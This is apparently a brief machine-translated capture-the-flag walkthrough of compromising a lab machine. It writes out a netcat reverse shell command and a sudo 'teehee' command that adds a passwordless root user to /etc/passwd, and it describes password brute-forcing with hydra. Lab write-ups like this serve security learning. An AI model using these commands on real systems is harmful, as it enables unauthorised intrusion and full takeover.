table of Contents
collect message
Host discovery
Port scan
Vulnerability discovery and exploitation
Visit 80:
a login box, and the user name admin is also given. Blasting password: happy; login.
A page that can execute commands:
capture packets and make modifications:
there is a command execution vulnerability.
Reverse shell
nc -e /bin/bash ip address port
Three users were found in the home directory:
Open these three directories in turn:
only the jim directory has files:
Found after opening:
Open the file, it may be a password file.
Use hydra for ssh blasting:
Use ssh to connect:
Right escalation
There is an email in the /var/mail/ directory, open it: I
got the account password of Charles.
Switch to this user and view the sudo commands that can be executed:
teehee -a can append content to a file, use:
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Add a user with root privileges to /etc/passwd, and the password is blank.
Switch user:
to sum up
New knowledge: teehee rights escalation method.